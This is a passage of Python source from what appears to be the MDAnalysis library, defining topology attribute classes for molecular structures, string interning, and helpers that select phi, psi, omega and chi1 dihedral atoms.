        # called ``type.__init__(type, name, bases, classdict)``, which
        # passed the ``type`` object instead of ``cls`` and so skipped
        # proper initialisation of the class being created.)
        super().__init__(name, bases, classdict)
        attrname = classdict.get('attrname')
        singular = classdict.get('singular', attrname)
        if attrname is None:
            attrname = singular
        if singular:
            # register under both spellings, plus normalised (lowercase,
            # underscore-free) forms for fuzzy name matching
            _TOPOLOGY_ATTRS[singular] = _TOPOLOGY_ATTRS[attrname] = cls
            _singular = singular.lower().replace('_', '')
            _attrname = attrname.lower().replace('_', '')
            _TOPOLOGY_ATTRNAMES[_singular] = singular
            _TOPOLOGY_ATTRNAMES[_attrname] = attrname
            for clstype, transplants in cls.transplants.items():
                for name, method in transplants:
                    _TOPOLOGY_TRANSPLANTS[name] = [attrname, method, clstype]
                    clean = name.lower().replace('_', '')
                    _TOPOLOGY_ATTRNAMES[clean] = name
            for attr in ['singular', 'attrname']:
                try:
                    attrname = classdict[attr]
                except KeyError:
                    pass
                else:
                    _attach_transplant_stubs(attrname, cls)
            # add each to "same attr as" class
            if singular not in selection.SameSelection.prop_trans:
                selection.SameSelection.prop_trans[singular] = attrname
            # add each to the property selection class
            if singular not in selection.PropertySelection.props:
                selection.PropertySelection.props[singular] = attrname
            # add token to selectiondict
            if singular not in selection._SELECTIONDICT:
                dtype = classdict.get("dtype")
                if dtype is not None:
                    per_obj = classdict.get("per_object", bases[0].per_object)
                    try:
                        selection.gen_selection_class(singular, attrname,
                                                      dtype, per_obj)
                    except ValueError:
                        msg = ("A selection keyword could not be "
                               "automatically generated for the "
                               f"{singular} attribute. If you need a "
                               "selection keyword, define it manually "
                               "by subclassing core.selection.Selection")
                        warnings.warn(msg)
            # TODO: remove in 3.0
            if attrname == "tempfactors":
                # register the deprecated bfactor alias and wrap its
                # selection keyword so use of it warns (see BFACTOR_WARNING)
                _TOPOLOGY_ATTRS["bfactor"] = _TOPOLOGY_ATTRS["bfactors"] = cls
                selcls = selection.gen_selection_class("bfactor", "bfactors",
                                                       classdict.get("dtype"),
                                                       per_object="atom")
                selcls.apply = deprecate_bfactor_warning(selcls.apply)
class TopologyAttr(object, metaclass=_TopologyAttrMeta):
    """Base class for Topology attributes.
    Note
    ----
    This class is intended to be subclassed, and mostly amounts to
    a skeleton. The methods here should be present in all
    :class:`TopologyAttr` child classes, but by default they raise
    appropriate exceptions.
    Attributes
    ----------
    attrname : str
        the name used for the attribute when attached to a ``Topology`` object
    singular : str
        name for the attribute on a singular object (Atom/Residue/Segment)
    per_object : str
        If there is a strict mapping between Component and Attribute
    dtype : int/float/object
        Type to coerce this attribute to be. For string use 'object'
    top : Topology
        handle for the Topology object TopologyAttr is associated with
    """
    # These class-level declarations are read by _TopologyAttrMeta at
    # class-creation time to register each subclass.
    attrname = 'topologyattrs'
    singular = 'topologyattr'
    per_object = None  # ie Resids per_object = 'residue'
    top = None  # pointer to Topology object
    transplants = defaultdict(list)
    target_classes = []
    groupdoc = None
    singledoc = None
    dtype = None
    def __init__(self, values, guessed=False):
        # coerce to the declared dtype when one is set; otherwise store as-is
        if self.dtype is None:
            self.values = values
        else:
            self.values = np.asarray(values, dtype=self.dtype)
        self._guessed = guessed
    @staticmethod
    def _gen_initial_values(n_atoms, n_residues, n_segments):
        """Populate an initial empty data structure for this Attribute
        The only provided parameters are the "shape" of the Universe
        Eg for charges, provide np.zeros(n_atoms)
        """
        raise NotImplementedError("No default values")
    @classmethod
    def from_blank(cls, n_atoms=None, n_residues=None, n_segments=None,
                   values=None):
        """Create a blank version of this TopologyAttribute
        Parameters
        ----------
        n_atoms : int, optional
            Size of the TopologyAttribute atoms
        n_residues: int, optional
            Size of the TopologyAttribute residues
        n_segments : int, optional
            Size of the TopologyAttribute segments
        values : optional
            Initial values for the TopologyAttribute
        """
        if values is None:
            values = cls._gen_initial_values(n_atoms, n_residues, n_segments)
        elif cls.dtype is not None:
            # if supplied starting values and statically typed
            values = np.asarray(values, dtype=cls.dtype)
        return cls(values)
    def copy(self):
        """Return a deepcopy of this attribute"""
        return self.__class__(self.values.copy(), guessed=self._guessed)
    def __len__(self):
        """Length of the TopologyAttr at its intrinsic level."""
        return len(self.values)
    def __getitem__(self, group):
        """Accepts an AtomGroup, ResidueGroup or SegmentGroup"""
        # dispatch to the appropriate level getter; note this falls
        # through (returning None) for unrecognised group types
        if isinstance(group, (Atom, AtomGroup)):
            return self.get_atoms(group)
        elif isinstance(group, (Residue, ResidueGroup)):
            return self.get_residues(group)
        elif isinstance(group, (Segment, SegmentGroup)):
            return self.get_segments(group)
    def __setitem__(self, group, values):
        """Set values via an Atom/Residue/Segment Component or Group."""
        if isinstance(group, (Atom, AtomGroup)):
            return self.set_atoms(group, values)
        elif isinstance(group, (Residue, ResidueGroup)):
            return self.set_residues(group, values)
        elif isinstance(group, (Segment, SegmentGroup)):
            return self.set_segments(group, values)
    @property
    def is_guessed(self):
        """Bool of if the source of this information is a guess"""
        return self._guessed
    def _add_new(self, newval):
        """Resize TopologyAttr to one larger, with *newval* as the new value
        .. versionadded:: 2.1.0
        """
        self.values = np.concatenate([self.values, np.array([newval])])
    def get_atoms(self, ag):
        """Get atom attributes for a given AtomGroup"""
        raise NoDataError
    def set_atoms(self, ag, values):
        """Set atom attributes for a given AtomGroup"""
        raise NotImplementedError
    def get_residues(self, rg):
        """Get residue attributes for a given ResidueGroup"""
        raise NoDataError
    def set_residues(self, rg, values):
        """Set residue attributes for a given ResidueGroup"""
        raise NotImplementedError
    def get_segments(self, sg):
        """Get segment attributes for a given SegmentGroup"""
        raise NoDataError
    def set_segments(self, sg, values):
        """Set segment attributes for a given SegmentGroup"""
        raise NotImplementedError
# core attributes
class Atomindices(TopologyAttr):
    """Globally unique indices for each atom in the group.
    If the group is an AtomGroup, then this gives the index for each atom in
    the group. This is the unambiguous identifier for each atom in the
    topology, and it is not alterable.
    If the group is a ResidueGroup or SegmentGroup, then this gives the indices
    of each atom represented in the group in a 1-D array, in the order of the
    elements in that group.
    """
    attrname = 'indices'
    singular = 'index'
    target_classes = [AtomGroup, ResidueGroup, SegmentGroup, Atom]
    dtype = int
    def __init__(self):
        # indices are derived from the Topology itself, so no values stored
        self._guessed = False
    def set_atoms(self, ag, values):
        # indices are the identity of each atom; rewriting them is forbidden
        raise AttributeError("Atom indices are fixed; they cannot be reset")
    def get_atoms(self, ag):
        return ag.ix
    def get_residues(self, rg):
        # one array of atom indices per residue in the group
        return list(self.top.tt.residues2atoms_2d(rg.ix))
    def get_segments(self, sg):
        # one array of atom indices per segment in the group
        return list(self.top.tt.segments2atoms_2d(sg.ix))
class Resindices(TopologyAttr):
    """Globally unique resindices for each residue in the group.
    If the group is an AtomGroup, then this gives the resindex for each atom in
    the group. This unambiguously determines each atom's residue membership.
    Resetting these values changes the residue membership of the atoms.
    If the group is a ResidueGroup or SegmentGroup, then this gives the
    resindices of each residue represented in the group in a 1-D array, in the
    order of the elements in that group.
    """
    attrname = 'resindices'
    singular = 'resindex'
    target_classes = [AtomGroup, ResidueGroup, SegmentGroup, Atom, Residue]
    dtype = int
    def __init__(self):
        # indices are derived from the Topology itself, so no values stored
        self._guessed = False
    def get_atoms(self, ag):
        # residue index of each atom via the topology transtable
        return self.top.tt.atoms2residues(ag.ix)
    def get_residues(self, rg):
        return rg.ix
    def set_residues(self, rg, values):
        # residue indices identify residues; rewriting them is forbidden
        raise AttributeError("Residue indices are fixed; they cannot be reset")
    def get_segments(self, sg):
        # one array of residue indices per segment in the group
        return list(self.top.tt.segments2residues_2d(sg.ix))
class Segindices(TopologyAttr):
    """Globally unique segindices for each segment in the group.
    If the group is an AtomGroup, then this gives the segindex for each atom in
    the group. This unambiguously determines each atom's segment membership.
    It is not possible to set these, since membership in a segment is an
    attribute of each atom's residue.
    If the group is a ResidueGroup or SegmentGroup, then this gives the
    segindices of each segment represented in the group in a 1-D array, in the
    order of the elements in that group.
    """
    attrname = 'segindices'
    singular = 'segindex'
    dtype = int
    target_classes = [AtomGroup, ResidueGroup, SegmentGroup,
                      Atom, Residue, Segment]
    def __init__(self):
        # indices are derived from the Topology itself, so no values stored
        self._guessed = False
    def get_atoms(self, ag):
        # segment index of each atom via the topology transtable
        return self.top.tt.atoms2segments(ag.ix)
    def get_residues(self, rg):
        return self.top.tt.residues2segments(rg.ix)
    def get_segments(self, sg):
        return sg.ix
    def set_segments(self, sg, values):
        # segment indices identify segments; rewriting them is forbidden
        raise AttributeError("Segment indices are fixed; they cannot be reset")
# atom attributes
class AtomAttr(TopologyAttr):
    """Base class for atom attributes.
    """
    attrname = 'atomattrs'
    singular = 'atomattr'
    target_classes = [AtomGroup, ResidueGroup, SegmentGroup, Atom]
    def get_atoms(self, ag):
        # values are stored per atom, so this is a direct fancy-index lookup
        return self.values[ag.ix]
    @_check_length
    def set_atoms(self, ag, values):
        # _check_length ensures `values` is a single value or one per atom
        self.values[ag.ix] = values
    def get_residues(self, rg):
        """By default, the values for each atom present in the set of residues
        are returned as a list with one array per residue. This behavior can
        be overridden in child attributes.
        """
        aixs = self.top.tt.residues2atoms_2d(rg.ix)
        return [self.values[aix] for aix in aixs]
    def set_residues(self, rg, values):
        # atom-level attribute: setting from residue level is a user error
        raise _wronglevel_error(self, rg)
    def get_segments(self, sg):
        """By default, the values for each atom present in the set of segments
        are returned as a list with one array per segment. This behavior can
        be overridden in child attributes.
        """
        aixs = self.top.tt.segments2atoms_2d(sg.ix)
        return [self.values[aix] for aix in aixs]
    def set_segments(self, sg, values):
        # atom-level attribute: setting from segment level is a user error
        raise _wronglevel_error(self, sg)
# TODO: update docs to property doc
class Atomids(AtomAttr):
    """ID for each atom.
    """
    attrname = 'ids'
    singular = 'id'
    per_object = 'atom'
    dtype = int
    @staticmethod
    def _gen_initial_values(na, nr, ns):
        # default ids are 1-based serial numbers
        return np.arange(1, na + 1)
class _StringInternerMixin:
    """Mixin implementing string interning for topology attributes.

    Keeping a single copy of each distinct string makes string matching
    fast (see _ProtoStringSelection).  State kept in sync:

    self.namedict (dict)
        - maps actual string to string index (str->int)
    self.name_lookup (array dtype object)
        - maps string index to actual string (int->str)
    self.nmidx (array dtype int)
        - maps atom index to string index (int->int)
    self.values (array dtype object)
        - the premade per-object string values

    .. versionadded:: 2.1.0
       Mashed together the different implementations to keep it DRY.
    """
    def __init__(self, vals, guessed=False):
        self._guessed = guessed
        self.namedict = {}  # str -> interned index
        uniques = []  # interned index -> str
        # per-object pointer into the interned table, e.g. atom 5 is 'C':
        # nmidx[5] == 7 and uniques[7] == 'C'
        self.nmidx = np.zeros_like(vals, dtype=int)
        for pos, label in enumerate(vals):
            interned = self.namedict.get(label)
            if interned is None:
                interned = len(uniques)
                self.namedict[label] = interned
                uniques.append(label)
            self.nmidx[pos] = interned
        self.name_lookup = np.array(uniques, dtype=object)
        self.values = self.name_lookup[self.nmidx]
    def _add_new(self, newval):
        """Resize this attribute to size+1, with *newval* as the new entry.

        Parameters
        ----------
        newval : str
            value to append

        Overridden here because the interning tables must be kept in sync.

        .. versionadded:: 2.1.0
        """
        interned = self.namedict.get(newval)
        if interned is None:
            # brand-new string: intern it first
            interned = len(self.namedict)
            self.namedict[newval] = interned
            self.name_lookup = np.concatenate([self.name_lookup, [newval]])
        self.nmidx = np.concatenate([self.nmidx, [interned]])
        self.values = np.concatenate([self.values, [newval]])
    def _set_X(self, ag, values):
        # accepts either a single string for the whole group,
        # or one string per member of the group
        fresh = []  # strings not interned before this call
        if isinstance(values, str):
            interned = self.namedict.get(values)
            if interned is None:
                interned = len(self.namedict)
                self.namedict[values] = interned
                fresh.append(values)
        else:
            interned = np.zeros_like(values, dtype=int)
            for pos, label in enumerate(values):
                stored = self.namedict.get(label)
                if stored is None:
                    stored = len(self.namedict)
                    self.namedict[label] = stored
                    fresh.append(label)
                interned[pos] = stored
        self.nmidx[ag.ix] = interned  # scalar or array, broadcasts either way
        if fresh:
            self.name_lookup = np.concatenate([self.name_lookup, fresh])
        self.values = self.name_lookup[self.nmidx]
# woe betide anyone who switches this inheritance order
# Mixin needs to be first (L to R) to get correct __init__ and set_atoms
class AtomStringAttr(_StringInternerMixin, AtomAttr):
    # String-valued per-atom attribute: interned storage comes from the
    # mixin (which must stay first in the MRO, see comment above), atom
    # get/set semantics from AtomAttr.
    @_check_length
    def set_atoms(self, ag, values):
        """Set the values for the atoms in ``ag`` (one string for the whole
        group, or one per atom)."""
        return self._set_X(ag, values)
    @staticmethod
    def _gen_initial_values(na, nr, ns):
        # default: one empty string per atom
        return np.full(na, '', dtype=object)
# TODO: update docs to property doc
class Atomnames(AtomStringAttr):
    """Name for each atom.
    """
    attrname = 'names'
    singular = 'name'
    per_object = 'atom'
    dtype = object
    transplants = defaultdict(list)
    def phi_selection(residue, c_name='C', n_name='N', ca_name='CA'):
        """Select AtomGroup corresponding to the phi protein backbone dihedral
        C'-N-CA-C.
        Parameters
        ----------
        c_name: str (optional)
            name for the backbone C atom
        n_name: str (optional)
            name for the backbone N atom
        ca_name: str (optional)
            name for the alpha-carbon atom
        Returns
        -------
        AtomGroup
            4-atom selection in the correct order. If no C' found in the
            previous residue (by resid) then this method returns ``None``.
        .. versionchanged:: 1.0.0
            Added arguments for flexible atom names and refactored code for
            faster atom matching with boolean arrays.
        """
        # fnmatch is expensive. try the obv candidate first
        prev = residue.universe.residues[residue.ix-1]
        sid = residue.segment.segid
        rid = residue.resid-1
        if not (prev.segment.segid == sid and prev.resid == rid):
            # the residue preceding by index is not the one preceding by
            # resid/segid: fall back to an explicit selection
            sel = 'segid {} and resid {}'.format(sid, rid)
            try:
                prev = residue.universe.select_atoms(sel).residues[0]
            except IndexError:
                return None
        c_ = prev.atoms[prev.atoms.names == c_name]
        # require exactly one matching atom for every name, else bail out
        if not len(c_) == 1:
            return None
        atnames = residue.atoms.names
        ncac_names = [n_name, ca_name, c_name]
        ncac = [residue.atoms[atnames == n] for n in ncac_names]
        if not all(len(ag) == 1 for ag in ncac):
            return None
        sel = c_+sum(ncac)
        return sel
    transplants[Residue].append(('phi_selection', phi_selection))
    def phi_selections(residues, c_name='C', n_name='N', ca_name='CA'):
        """Select list of AtomGroups corresponding to the phi protein
        backbone dihedral C'-N-CA-C.
        Parameters
        ----------
        c_name: str (optional)
            name for the backbone C atom
        n_name: str (optional)
            name for the backbone N atom
        ca_name: str (optional)
            name for the alpha-carbon atom
        Returns
        -------
        list of AtomGroups
            4-atom selections in the correct order. If no C' found in the
            previous residue (by resid) then corresponding item in the list
            is ``None``.
        .. versionadded:: 1.0.0
        """
        # NOTE(review): raises IndexError for an empty ResidueGroup
        # (residues[0]) — unlike psi_selections, which guards this; confirm
        u = residues[0].universe
        prev = u.residues[residues.ix-1]  # obv candidates first
        rsid = residues.segids
        prid = residues.resids-1
        ncac_names = [n_name, ca_name, c_name]
        sel = 'segid {} and resid {}'
        # replace wrong residues
        wix = np.where((prev.segids != rsid) | (prev.resids != prid))[0]
        invalid = []
        if len(wix):
            prevls = list(prev)
            for s, r, i in zip(rsid[wix], prid[wix], wix):
                try:
                    prevls[i] = u.select_atoms(sel.format(s, r)).residues[0]
                except IndexError:
                    invalid.append(i)
            prev = sum(prevls)
        # keep only residues where every needed atom occurs exactly once
        keep_prev = [sum(r.atoms.names == c_name) == 1 for r in prev]
        keep_res = [all(sum(r.atoms.names == n) == 1 for n in ncac_names)
                    for r in residues]
        keep = np.array(keep_prev) & np.array(keep_res)
        keep[invalid] = False
        results = np.zeros_like(residues, dtype=object)
        results[~keep] = None
        prev = prev[keep]
        residues = residues[keep]
        keepix = np.where(keep)[0]
        c_ = prev.atoms[prev.atoms.names == c_name]
        n = residues.atoms[residues.atoms.names == n_name]
        ca = residues.atoms[residues.atoms.names == ca_name]
        c = residues.atoms[residues.atoms.names == c_name]
        results[keepix] = [sum(atoms) for atoms in zip(c_, n, ca, c)]
        return list(results)
    transplants[ResidueGroup].append(('phi_selections', phi_selections))
    def psi_selection(residue, c_name='C', n_name='N', ca_name='CA'):
        """Select AtomGroup corresponding to the psi protein backbone dihedral
        N-CA-C-N'.
        Parameters
        ----------
        c_name: str (optional)
            name for the backbone C atom
        n_name: str (optional)
            name for the backbone N atom
        ca_name: str (optional)
            name for the alpha-carbon atom
        Returns
        -------
        AtomGroup
            4-atom selection in the correct order. If no N' found in the
            following residue (by resid) then this method returns ``None``.
        .. versionchanged:: 1.0.0
            Added arguments for flexible atom names and refactored code for
            faster atom matching with boolean arrays.
        """
        # fnmatch is expensive. try the obv candidate first
        _manual_sel = False
        sid = residue.segment.segid
        rid = residue.resid+1
        try:
            nxt = residue.universe.residues[residue.ix+1]
        except IndexError:
            # last residue in the Universe: must search by resid/segid
            _manual_sel = True
        else:
            if not (nxt.segment.segid == sid and nxt.resid == rid):
                _manual_sel = True
        if _manual_sel:
            sel = 'segid {} and resid {}'.format(sid, rid)
            try:
                nxt = residue.universe.select_atoms(sel).residues[0]
            except IndexError:
                return None
        n_ = nxt.atoms[nxt.atoms.names == n_name]
        # require exactly one matching atom for every name, else bail out
        if not len(n_) == 1:
            return None
        atnames = residue.atoms.names
        ncac_names = [n_name, ca_name, c_name]
        ncac = [residue.atoms[atnames == n] for n in ncac_names]
        if not all(len(ag) == 1 for ag in ncac):
            return None
        sel = sum(ncac) + n_
        return sel
    transplants[Residue].append(('psi_selection', psi_selection))
    def _get_next_residues_by_resid(residues):
        """Select list of Residues corresponding to the next resid for each
        residue in `residues`.
        Returns
        -------
        List of Residues
            List of the next residues in the Universe, by resid and segid.
            If not found, the corresponding item in the list is ``None``.
        .. versionadded:: 1.0.0
        """
        try:
            u = residues[0].universe
        except IndexError:
            # empty input: nothing to look up
            return residues
        nxres = np.array([None]*len(residues), dtype=object)
        ix = np.arange(len(residues))
        # no guarantee residues is ordered or unique
        last = max(residues.ix)
        if last == len(u.residues)-1:
            # the very last residue of the Universe has no successor by
            # index; drop it before shifting indices by +1
            notlast = residues.ix != last
            ix = ix[notlast]
            residues = residues[notlast]
        nxres[ix] = nxt = u.residues[residues.ix+1]
        rsid = residues.segids
        nrid = residues.resids+1
        sel = 'segid {} and resid {}'
        # replace wrong residues
        wix = np.where((nxt.segids != rsid) | (nxt.resids != nrid))[0]
        if len(wix):
            for s, r, i in zip(rsid[wix], nrid[wix], wix):
                try:
                    nxres[ix[i]] = u.select_atoms(sel.format(s, r)).residues[0]
                except IndexError:
                    nxres[ix[i]] = None
        return nxres
    transplants[ResidueGroup].append(('_get_next_residues_by_resid',
                                      _get_next_residues_by_resid))
    def _get_prev_residues_by_resid(residues):
        """Select list of Residues corresponding to the previous resid for each
        residue in `residues`.
        Returns
        -------
        List of Residues
            List of the previous residues in the Universe, by resid and segid.
            If not found, the corresponding item in the list is ``None``.
        .. versionadded:: 1.0.0
        """
        try:
            u = residues[0].universe
        except IndexError:
            # empty input: nothing to look up
            return residues
        pvres = np.array([None]*len(residues))
        pvres[:] = prev = u.residues[residues.ix-1]
        rsid = residues.segids
        prid = residues.resids-1
        sel = 'segid {} and resid {}'
        # replace wrong residues
        wix = np.where((prev.segids != rsid) | (prev.resids != prid))[0]
        if len(wix):
            for s, r, i in zip(rsid[wix], prid[wix], wix):
                try:
                    pvres[i] = u.select_atoms(sel.format(s, r)).residues[0]
                except IndexError:
                    pvres[i] = None
        return pvres
    transplants[ResidueGroup].append(('_get_prev_residues_by_resid',
                                      _get_prev_residues_by_resid))
    def psi_selections(residues, c_name='C', n_name='N', ca_name='CA'):
        """Select list of AtomGroups corresponding to the psi protein
        backbone dihedral N-CA-C-N'.
        Parameters
        ----------
        c_name: str (optional)
            name for the backbone C atom
        n_name: str (optional)
            name for the backbone N atom
        ca_name: str (optional)
            name for the alpha-carbon atom
        Returns
        -------
        List of AtomGroups
            4-atom selections in the correct order. If no N' found in the
            following residue (by resid) then the corresponding item in the
            list is ``None``.
        .. versionadded:: 1.0.0
        """
        results = np.array([None]*len(residues), dtype=object)
        nxtres = residues._get_next_residues_by_resid()
        # rix: positions that actually have a next residue
        rix = np.where(nxtres)[0]
        nxt = sum(nxtres[rix])
        residues = residues[rix]
        ncac_names = [n_name, ca_name, c_name]
        # keep only residues where every needed atom occurs exactly once
        keep_nxt = [sum(r.atoms.names == n_name) == 1 for r in nxt]
        keep_res = [all(sum(r.atoms.names == n) == 1 for n in ncac_names)
                    for r in residues]
        keep = np.array(keep_nxt) & np.array(keep_res)
        nxt = nxt[keep]
        residues = residues[keep]
        keepix = np.where(keep)[0]
        n = residues.atoms[residues.atoms.names == n_name]
        ca = residues.atoms[residues.atoms.names == ca_name]
        c = residues.atoms[residues.atoms.names == c_name]
        n_ = nxt.atoms[nxt.atoms.names == n_name]
        results[rix[keepix]] = [sum(atoms) for atoms in zip(n, ca, c, n_)]
        return list(results)
    transplants[ResidueGroup].append(('psi_selections', psi_selections))
    def omega_selection(residue, c_name='C', n_name='N', ca_name='CA'):
        """Select AtomGroup corresponding to the omega protein backbone dihedral
        CA-C-N'-CA'.
        omega describes the -C-N- peptide bond. Typically, it is trans (180
        degrees) although cis-bonds (0 degrees) are also occasionally observed
        (especially near Proline).
        Parameters
        ----------
        c_name: str (optional)
            name for the backbone C atom
        n_name: str (optional)
            name for the backbone N atom
        ca_name: str (optional)
            name for the alpha-carbon atom
        Returns
        -------
        AtomGroup
            4-atom selection in the correct order. If no C' found in the
            previous residue (by resid) then this method returns ``None``.
        .. versionchanged:: 1.0.0
            Added arguments for flexible atom names and refactored code for
            faster atom matching with boolean arrays.
        """
        # fnmatch is expensive. try the obv candidate first
        _manual_sel = False
        sid = residue.segment.segid
        rid = residue.resid+1
        try:
            nxt = residue.universe.residues[residue.ix+1]
        except IndexError:
            # last residue in the Universe: must search by resid/segid
            _manual_sel = True
        else:
            if not (nxt.segment.segid == sid and nxt.resid == rid):
                _manual_sel = True
        if _manual_sel:
            sel = 'segid {} and resid {}'.format(sid, rid)
            try:
                nxt = residue.universe.select_atoms(sel).residues[0]
            except IndexError:
                return None
        ca = residue.atoms[residue.atoms.names == ca_name]
        c = residue.atoms[residue.atoms.names == c_name]
        n_ = nxt.atoms[nxt.atoms.names == n_name]
        ca_ = nxt.atoms[nxt.atoms.names == ca_name]
        # require exactly one matching atom for every name, else bail out
        if not all(len(ag) == 1 for ag in [ca_, n_, ca, c]):
            return None
        return ca+c+n_+ca_
    transplants[Residue].append(('omega_selection', omega_selection))
    def omega_selections(residues, c_name='C', n_name='N', ca_name='CA'):
        """Select list of AtomGroups corresponding to the omega protein
        backbone dihedral CA-C-N'-CA'.
        omega describes the -C-N- peptide bond. Typically, it is trans (180
        degrees) although cis-bonds (0 degrees) are also occasionally observed
        (especially near Proline).
        Parameters
        ----------
        c_name: str (optional)
            name for the backbone C atom
        n_name: str (optional)
            name for the backbone N atom
        ca_name: str (optional)
            name for the alpha-carbon atom
        Returns
        -------
        List of AtomGroups
            4-atom selections in the correct order. If no C' found in the
            previous residue (by resid) then the corresponding item in the
            list is ``None``.
        .. versionadded:: 1.0.0
        """
        results = np.array([None]*len(residues), dtype=object)
        nxtres = residues._get_next_residues_by_resid()
        # rix: positions that actually have a next residue
        rix = np.where(nxtres)[0]
        nxt = sum(nxtres[rix])
        residues = residues[rix]
        nxtatoms = [ca_name, n_name]
        resatoms = [ca_name, c_name]
        # keep only residues where every needed atom occurs exactly once
        keep_nxt = [all(sum(r.atoms.names == n) == 1 for n in nxtatoms)
                    for r in nxt]
        keep_res = [all(sum(r.atoms.names == n) == 1 for n in resatoms)
                    for r in residues]
        keep = np.array(keep_nxt) & np.array(keep_res)
        nxt = nxt[keep]
        residues = residues[keep]
        keepix = np.where(keep)[0]
        c = residues.atoms[residues.atoms.names == c_name]
        ca = residues.atoms[residues.atoms.names == ca_name]
        n_ = nxt.atoms[nxt.atoms.names == n_name]
        ca_ = nxt.atoms[nxt.atoms.names == ca_name]
        results[rix[keepix]] = [sum(atoms) for atoms in zip(ca, c, n_, ca_)]
        return list(results)
    transplants[ResidueGroup].append(('omega_selections', omega_selections))
    def chi1_selection(residue, n_name='N', ca_name='CA', cb_name='CB',
                       cg_name='CG CG1 OG OG1 SG'):
        r"""Select AtomGroup corresponding to the chi1 sidechain dihedral ``N-CA-CB-*G.``
        The gamma atom is taken to be the heavy atom in the gamma position. If more than one
        heavy atom is present (e.g. CG1 and CG2), the one with the lower number is used (CG1).
        .. warning::
            This numbering of chi1 atoms here in following with the IUPAC 1970 rules.
            However, it should be noted that analyses which use dihedral angles may have
            different definitions. For example, the
            :class:`MDAnalysis.analysis.dihedrals.Janin` class does not incorporate
            amino acids where the gamma atom is not carbon, into its chi1 selections.
        Parameters
        ----------
        n_name: str (optional)
            name for the backbone N atom
        ca_name: str (optional)
            name for the alpha-carbon atom
        cb_name: str (optional)
            name for the beta-carbon atom
        cg_name: str (optional)
            name(s) for the gamma atom; may be a space-separated list of
            candidate names, as used by the ``name`` selection keyword
        Returns
        -------
        AtomGroup
            4-atom selection in the correct order. If no CB and/or CG is found
            then this method returns ``None``.
        .. versionadded:: 0.7.5
        .. versionchanged:: 1.0.0
            Added arguments for flexible atom names and refactored code for
            faster atom matching with boolean arrays.
        """
        # each name may expand to several candidates; require exactly one hit
        names = [n_name, ca_name, cb_name, cg_name]
        ags = [residue.atoms.select_atoms(f"name {n}") for n in names]
        if any(len(ag) != 1 for ag in ags):
            return None
        return sum(ags)
    transplants[Residue].append(('chi1_selection', chi1_selection))
    def chi1_selections(residues, n_name='N', ca_name='CA', cb_name='CB',
                        cg_name='CG'):
        """Select list of AtomGroups corresponding to the chi1 sidechain dihedral
        N-CA-CB-CG.
        Parameters
        ----------
        n_name: str (optional)
            name for the backbone N atom
        ca_name: str (optional)
            name for the alpha-carbon atom
        cb_name: str (optional)
            name for the beta-carbon atom
        cg_name: str (optional)
            name for the gamma-carbon atom
        Returns
        -------
        List of AtomGroups
            4-atom selections in the correct order. If no CB and/or CG is found
            then the corresponding item in the list is ``None``.
        .. versionadded:: 1.0.0
        """
        # NOTE(review): default cg_name here is 'CG' only, while
        # chi1_selection accepts 'CG CG1 OG OG1 SG' — confirm whether this
        # asymmetry is intended
        results = np.array([None]*len(residues))
        names = [n_name, ca_name, cb_name, cg_name]
        # keep only residues where every needed atom occurs exactly once
        keep = [all(sum(r.atoms.names == n) == 1 for n in names)
                for r in residues]
        keepix = np.where(keep)[0]
        residues = residues[keep]
        atnames = residues.atoms.names
        ags = [residues.atoms[atnames == n] for n in names]
        results[keepix] = [sum(atoms) for atoms in zip(*ags)]
        return list(results)
    transplants[ResidueGroup].append(('chi1_selections', chi1_selections))
# TODO: update docs to property doc
class Atomtypes(AtomStringAttr):
    """Type for each atom"""
    attrname = 'types'
    singular = 'type'
    per_object = 'atom'
    dtype = object
# TODO: update docs to property doc
class Elements(AtomStringAttr):
    """Element for each atom"""
    attrname = 'elements'
    singular = 'element'
    dtype = object
    @staticmethod
    def _gen_initial_values(na, nr, ns):
        # unknown elements default to the empty string
        return np.array(['' for _ in range(na)], dtype=object)
# TODO: update docs to property doc
class Radii(AtomAttr):
    """Radii for each atom"""
    attrname = 'radii'
    singular = 'radius'
    per_object = 'atom'
    dtype = float
    @staticmethod
    def _gen_initial_values(na, nr, ns):
        # unknown radii default to 0.0
        return np.zeros(na)
class RecordTypes(AtomStringAttr):
    """For PDB-like formats, indicates if ATOM or HETATM
    Defaults to 'ATOM'
    .. versionchanged:: 0.20.0
        Now stores array of dtype object rather than boolean mapping
    """
    attrname = 'record_types'
    singular = 'record_type'
    per_object = 'atom'
    dtype = object
    @staticmethod
    def _gen_initial_values(na, nr, ns):
        # every atom defaults to an 'ATOM' record
        return np.array(['ATOM'] * na, dtype=object)
class ChainIDs(AtomStringAttr):
    """ChainID per atom
    Note
    ----
    This is an attribute of the Atom, not Residue or Segment
    """
    attrname = 'chainIDs'
    singular = 'chainID'
    per_object = 'atom'
    dtype = object
class Tempfactors(AtomAttr):
    """Tempfactor for atoms"""
    attrname = 'tempfactors'
    singular = 'tempfactor'
    per_object = 'atom'
    dtype = float
    transplants = defaultdict(list)
    @staticmethod
    def _gen_initial_values(na, nr, ns):
        # tempfactors default to 0.0
        return np.zeros(na)
    # TODO: remove bfactors in 3.0
    # The methods below are deprecated aliases that forward to the
    # tempfactor attribute; each emits a DeprecationWarning when used.
    @deprecate_bfactor_warning
    def bfactor(self):
        """Alias for tempfactor
        The bfactor topology attribute is only
        provided as an alias to the tempfactor
        attribute. It will be removed in
        3.0. Please use the tempfactor attribute
        instead.
        .. versionadded:: 2.0.0
        .. deprecated:: 2.0.0
            Will be removed in 3.0.0. Use the
            ``tempfactor`` attribute instead.
        """
        return self.universe.atoms[self.ix].tempfactor
    @deprecate_bfactor_warning
    def bfactor_setter(self, value):
        """Tempfactor alias property for atom
        .. versionadded:: 2.0.0
        """
        self.universe.atoms[self.ix].tempfactor = value
    @deprecate_bfactor_warning
    def bfactors(self):
        """Alias for tempfactors
        The bfactor topology attribute is only
        provided as an alias to the tempfactor
        attribute. It will be removed in
        3.0. Please use the tempfactor attribute
        instead.
        .. versionadded:: 2.0.0
        .. deprecated:: 2.0.0
            Will be removed in 3.0.0. Use the
            ``tempfactor`` attribute instead.
        """
        return self.universe.atoms[self.atoms.ix].tempfactors
    @deprecate_bfactor_warning
    def bfactors_setter(self, value):
        """Tempfactor alias property for groups of atoms
        .. versionadded:: 2.0.0
        """
        self.universe.atoms[self.atoms.ix].tempfactors = value
    # register the deprecated aliases as read/write properties on Atom
    # (singular) and on every group/component level (plural)
    transplants[Atom].append(
        ('bfactor', property(bfactor, bfactor_setter, None,
                             bfactor.__doc__)))
    for group in (AtomGroup, Residue, ResidueGroup, Segment, SegmentGroup):
        transplants[group].append(
            ("bfactors", property(bfactors, bfactors_setter, None,
                                  bfactors.__doc__)))
class Masses(AtomAttr):
